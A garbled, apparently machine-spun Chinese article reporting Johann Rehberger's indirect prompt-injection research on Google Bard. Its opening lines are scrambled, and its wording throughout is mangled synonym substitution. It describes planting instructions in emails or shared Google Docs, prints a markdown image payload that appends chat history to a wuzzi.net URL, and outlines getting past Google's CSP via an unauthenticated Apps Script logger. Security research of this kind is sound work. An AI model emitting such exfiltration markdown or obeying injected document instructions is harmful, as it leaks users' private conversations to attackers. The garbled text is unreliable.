操控 Bard 的破防怪异 :运用一种叫揭示注入(Prompt Injection)的技术 ,黑客可能只运用做作语言破解家养智能零星。用做言破
大型语言模子在天生文本时颇为依赖揭示词 。作语这种侵略技术对于经由揭示词学习模子而言堪称是解揭据泄「以彼之矛,攻己之盾」 ,示注是入引最强长项,同时也是起数难以提防的软肋。
揭示词分为零星指令以及用户给出的露危指令,在做作语言中 ,破防这两者难以分说 。用做言破假如用户分心在输入揭示词时,作语模拟零星指令,解揭据泄那末模子可能在对于话里泄露一些惟独它才知道的示注「怪异」 。
揭示注入侵略有多种方式,入引主要为直接揭示注入以及直接揭示注入。起数直接揭示注入指用户直接向模子输入恶意指令,试图激发意外或者有害的行动。直接揭示注入指侵略者将恶意指令注入到可能被模子检索或者摄入的文档中,从而直接地操作或者向导模子 。
最近,google Bard 迎来了一波强盛的更新,Bard 削减了拓展功能 ,反对于碰头 YouTube,搜查航班以及旅馆,还能查阅用户的总体文件以及邮件。
除了此之外,Bard 可能衔接到「google合家桶」 ,碰头你的google云盘、文档以及邮件!但这同时象征着 Bard 将合成不受信托的数据 ,简略受直接揭示注入的影响。也便是说,不怀盛意的人可能经由向你发送电子邮件或者强行分享google文档妨碍直接的揭示注入侵略,由于对于方发甚么样的邮件、文档给你,你是操作不了的,但 Bard 却会无差距碰头。
在清静危害合陋习模有着 20 年履历的前微软 Azure 清静工程师 Johann Rehberger 体验了 Bard 的全新版本,并测试了被揭示注入侵略时,Bard 的数据泄露危害。
原博客链接 :https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?continueFlag=53578cc8c5c0a6a19c571a1fa6bcab85
Johann 首先快捷验证了揭示注入的可行性 。他经由让 Bard 合成旧的 YouTube 视频,并运用google文档妨碍测试测试服从展现,Bard 简直凭证他的格外揭示妨碍了操作 ,这证明了接下来要妨碍的测试的可行性。
Bard 的倾向:图像 Markdown 注入
在患上悉 Bard 可能被揭示注入后 ,Johann 开始了进一步的钻研。
LLM 运用中的一个罕有倾向是经由渲染超链接以及图像来激进谈天历史记实 。下场是,这若何适用于google Bard ?
当google的大模子返回文本时 ,它可从前往 markdown 元素,Bard 将其泛起为 HTML! 这搜罗渲染图像的功能。
想象一下google的大模子返回这样的文本 :
![Data Exfiltration in Progress](https://wuzzi.net/logo.png?goog=[DATA_EXFILTRATION])
这将泛起为 HTML 图像标志 ,其 src 属性指向 attacker 效率器。
浏览器会自动衔接到 URL,无需用户交互即可加载图片 。借助 LLM 的强盛功能,咱们可能在谈天高下文中总结或者碰头从前的数据 ,并将其响应地附加到 URL 中。
在编写倾向运用挨次时,Johann 很快就开拓出了一个揭示注入实用载荷 ,它可能读取对于话的历史记实 ,并组成一个搜罗该历史记实的超链接。可是,google的内容清静策略(CSP)克制了图像的渲染。这对于侵略者来说是一个难题 。
绕过内容清静策略
要从侵略者操作的效率器渲染图片,并不易 。google的内容清静策略克制从恣意源加载图片。CSP 搜罗诸如 *.google.com 以及 *.googleusercontent.com 之类的源,至关普遍。这象征着理当能找到一种绕过措施。
钻研后,Johann 患上悉了 Google Apps Script ,这或者允许以绕过 CSP 。
Apps Scripts 相似于 Office 里的宏,可能经由 URL 调用,并在 script.google.com(或者 googleusercontent.com)域上运行。
如斯一来 ,Bard Logger 可能在 Apps Script 中实现为了。这个 Logger 将所有附加到调用 URL 的查问参数写入一个 Google Doc ,而它正是外泄的目的地 。
其后 ,Johann 以为这个措施并不可行 ,但他发现点击了多少下 Apps Script 用户界面后,他找到了一个无需验证的配置 。
接下来 ,所有豫备使命停当 :
确认了google Bard 易受经由扩展挨次数据直接注入揭示的影响